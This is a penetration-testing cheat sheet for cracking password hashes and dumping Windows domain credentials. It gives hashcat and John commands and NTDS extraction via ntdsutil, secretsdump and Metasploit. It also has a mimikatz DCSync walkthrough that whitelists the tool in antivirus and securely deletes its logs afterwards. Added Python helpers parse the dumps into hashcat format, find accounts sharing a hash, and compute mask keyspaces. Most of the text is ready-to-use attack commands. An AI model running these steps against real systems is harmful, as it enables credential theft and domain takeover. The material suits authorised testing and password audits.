Password cracking

Hash identifier

hash-identifier

Online cracking (CTF only)

https://hashkiller.co.uk/
https://crackstation.net/
https://www.onlinehashcrack.com/
http://cracker.offensive-security.com/
https://md5decrypt.net/en/
https://www.cmd5.org/
https://crack.sh/
https://gpuhash.me/
https://hash.help/
https://passwordrecovery.io/

CEWL

cewl <domain> -m 6 -w <out>

JtR

john --format=md5crypt unshadowed
auxiliary/analyze/jtr_crack_fast

Kerberoasting

john <krb.txt> --wordlist=</usr/share/wordlists/rockyou.txt>

Hashcat and Hashes

Hashcat SHA512 $6$ shadow file

hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

Hashcat MD5 $1$ shadow file

hashcat -m 500 -a 0 hash.txt rockyou.txt --username

Hashcat MD5 Apache webdav file

hashcat -m 1600 -a 0 hash.txt rockyou.txt

Hashcat SHA1

hashcat -m 100 -a 0 hash.txt rockyou.txt

Hashcat Wordpress

hashcat -m 400 -a 0 hash.txt rockyou.txt

Hashcat Kerberoasting

hashcat -m 13100 -a 0 hash.txt rockyou.txt

Crack SSH private key

A passphrase-protected legacy PEM key carries the header line Proc-Type: 4,ENCRYPTED; convert it to john format and crack the passphrase:
/opt/ssh2john.py id_rsa > id_john
john id_john --wordlist=</usr/share/wordlists/rockyou.txt>

Dump NTLM passwords

use windows/gather/credentials/domain_hashdump

Alternative methods

use auxiliary/admin/smb/psexec_ntdsgrab
Hashdump / smart_hashdump (unsafe for big AD)

Mimikatz Module:
lsadump::lsa /inject (totally unsafe)

Impacket

impacket-secretsdump <fqdn_domain>/<da_account>:'<password>'@<DC_ip> -just-dc

Ntdsutil (need a copy of SAM and SYSTEM too)

ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit

Dump

./adXtract.sh /root/ntds.dit /root/SYSTEM <projectname>

NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

Parsing

From impacket-secretsdump

grep '.*:.*:.*:.*:::' <impacket.hashes> | cut -d ':' -f1,4 | grep -v '\$' > <domain.hashes>

From MSF

db_export -f pwdump <mission.pwdump>
grep '.*:.*:.*:.*:::' mission.pwdump > mission.hashes

From ntds.dit + SYSTEM

secretsdump.py -ntds <ntds.dit> -system <SYSTEM> LOCAL | grep '.*:.*:.*:.*:::' | cut -d ":" -f 1,4 > /tmp/ntds.hash
git clone https://github.com/HarmJ0y/ImpDump /opt/Impdump
cd /opt/Impdump
chmod +x setup.sh
./setup.sh

/opt/Impdump/extract.sh <NTDS.dit> > /tmp/ntds.raw
/opt/Impdump/impdump.py <SYSTEM> /tmp/ntds.raw | cut -d ":" -f 1,4 > /tmp/ntds.hash

DCSync extraction method

Prerequisites
  • Domain Account with Replicating Directory Changes and Replicating Directory Changes All permissions. By default, this is limited to the Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups.
  • Be logged on with this account on any domain-joined system (server or workstation); it is not necessary to be on the domain controller itself.
  • Access to PowerShell on the system
  • Download the latest mimikatz release
  • Extract the archive and whitelist the binaries in the antivirus/AppLocker policy if necessary.
  • Download Secure Delete (sdelete) from Sysinternals

Extraction

Check the system architecture and choose the matching mimikatz build (32 or 64 bit).
Run the following command and read the "System Type" line:

C:\>systeminfo | findstr "System"
System Boot Time:          01-01-1970, 00:00:00
System Manufacturer:       Some manufacturer
System Model:              Some model
System Type:               x64-based PC
System Directory:          C:\WINDOWS\system32
System Locale:             fr-be;French (Belgium)

In the mimikatz prompt, type the following commands (one by one):

log C:\mimikatz.log
lsadump::dcsync /all /csv
exit

Open the mimikatz log file and remove every line that is not dcsync output (banner and prompt lines).
Each remaining line should have the format: userID username ntlmhash. Save and close the log file.

Parsing

Parse the hashes into hashcat username:hash syntax and store them in C:\ntlm.hash. The range slice is [1..2] in PowerShell, and Windows PowerShell's Out-File writes UTF-16 by default, which hashcat does not parse, hence -Encoding ascii:

Get-Content C:\mimikatz.log | ForEach-Object { $_ -replace "\s+",":" } | ForEach-Object { $_.split(":")[1..2] -join ":" } | Out-File -Encoding ascii C:\ntlm.hash
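
The secretsdump grep/cut pipeline in the Parsing section above and this PowerShell one-liner do the same job, so one added Python example (not part of the original cheat sheet) covers both: it normalises either format into hashcat user:nthash lines and adds the check a password audit wants next, which accounts share an NT hash. Every dump line and hash value in it is constructed sample data.

```python
import re
from collections import defaultdict

# impacket secretsdump line: DOMAIN\user:RID:LMhash:NThash:::  (what the page's grep '.*:.*:.*:.*:::' selects)
SECRETSDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)
# mimikatz `lsadump::dcsync /all /csv` log line: RID <ws> sAMAccountName <ws> NThash [<ws> more columns]
DCSYNC_RE = re.compile(r"^(\d+)\s+(\S+)\s+([0-9a-f]{32})", re.I)

# Constructed sample dumps: the hash values are placeholders, not real credentials
SECRETSDUMP_SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
CORP\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
CORP\\alice:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
CORP\\bob:1106:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
CORP\\WS01$:1107:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
[*] Cleaning up...""".splitlines()

DCSYNC_LOG_SAMPLE = """\
mimikatz # lsadump::dcsync /all /csv
[DC] 'corp.example' will be the domain
500\tAdministrator\t0123456789abcdef0123456789abcdef\t512
1105\talice\tfedcba9876543210fedcba9876543210\t512
1106\tbob\t0123456789abcdef0123456789abcdef\t66048
1107\tWS01$\t00112233445566778899aabbccddeeff\t4096
mimikatz # exit""".splitlines()


def parse_secretsdump(lines):
    """(user, nthash) pairs; machine accounts (name ending in $) are dropped like the page's grep -v '\\$'."""
    hits = (SECRETSDUMP_RE.match(line.strip()) for line in lines)
    return [(m.group(1), m.group(4).lower()) for m in hits if m and not m.group(1).endswith("$")]


def parse_dcsync_log(lines):
    """(user, nthash) pairs; banner and prompt lines fall out by themselves, replacing the manual clean-up step."""
    hits = (DCSYNC_RE.match(line.strip()) for line in lines)
    return [(m.group(2), m.group(3).lower()) for m in hits if m and not m.group(2).endswith("$")]


def to_hashcat(entries):
    """`user:nthash` lines as expected by hashcat -m 1000 with --username."""
    return [f"{user}:{nthash}" for user, nthash in entries]


def shared_hashes(entries):
    """Audit check: NT hashes are unsalted, so accounts with an identical hash share a password."""
    by_hash = defaultdict(list)
    for user, nthash in entries:
        by_hash[nthash].append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}
```

shared_hashes is worth running before any cracking: a hash shared between a privileged and an ordinary account is a finding on its own, whatever the password turns out to be.
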

Cleanup
  • Remove mimikatz (Downloaded archive, x32 and x64 folder, and all other files)
  • Remove any antivirus/AppLocker whitelist entries that were added
  • Securely remove C:\mimikatz.log with sdelete
  • Securely remove C:\ntlm.hash with sdelete

Password cracking NTLM (domain)

hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\best64.rule
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\d3*
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\realuniq.lst -r rules\best64.rule
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\small\* -r rules\*
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?a?a?a?a?a?a -i
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out -1 ?l?d -2 ?d?s ?u?l?l?l?l?1?1?2?2
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?d?d?d?d?d?d?d?d?d?d?d?d -i
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\efensive.rule

Common masks

hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?l?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?s
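Added example, not from the original cheat sheet: a keyspace calculator for the hashcat mask syntax used above, covering the built-in charsets, the -1/-2 custom charsets of the ?u?l?l?l?l?1?1?2?2 command and the -i increment mode. The hash rate given to seconds_to_exhaust is an input you measure; nothing here assumes a particular GPU.

```python
BUILTIN = {  # hashcat built-in charsets; ?a is the union of the other four (95 printable ASCII)
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
BUILTIN["a"] = "".join(BUILTIN.values())


def expand_charset(spec, custom=None):
    """Resolve a charset definition like '?l?d' (the page's -1 ?l?d) into a set of characters.
    custom maps '1'..'4' to their definitions (hashcat -1 .. -4); '??' is a literal '?'."""
    custom, chars, i = custom or {}, set(), 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                chars.add("?")
            elif key in BUILTIN:
                chars.update(BUILTIN[key])
            elif key in custom:
                chars.update(expand_charset(custom[key], custom))
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            chars.add(spec[i])  # literal character in the mask
            i += 1
    return chars


def position_sizes(mask, custom=None):
    """Charset size at each mask position; a literal character counts as 1."""
    sizes, i = [], 0
    while i < len(mask):
        step = 2 if mask[i] == "?" and i + 1 < len(mask) else 1
        sizes.append(len(expand_charset(mask[i:i + step], custom)))
        i += step
    return sizes


def keyspace(mask, custom=None, increment=False):
    """Candidates the mask generates; increment=True (hashcat -i) sums every prefix length 1..n."""
    sizes, total, prod = position_sizes(mask, custom), 0, 1
    for n, size in enumerate(sizes, 1):
        prod *= size
        if increment or n == len(sizes):
            total += prod
    return total


def seconds_to_exhaust(mask, rate, custom=None, increment=False):  # worst case at `rate` candidates/s
    return keyspace(mask, custom, increment) / rate
```

keyspace("?u?l?l?l?l?l?d?d?d") comes to about 3.1e11 candidates, minutes at most against unsalted NTLM on current GPU hardware; that figure is the concrete way to show why a "capitalised word plus digits" pattern gives a password policy no real protection.
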

Custom dictionary

1) Reuse cracked passwords
2) Establish patterns to perform mask attacks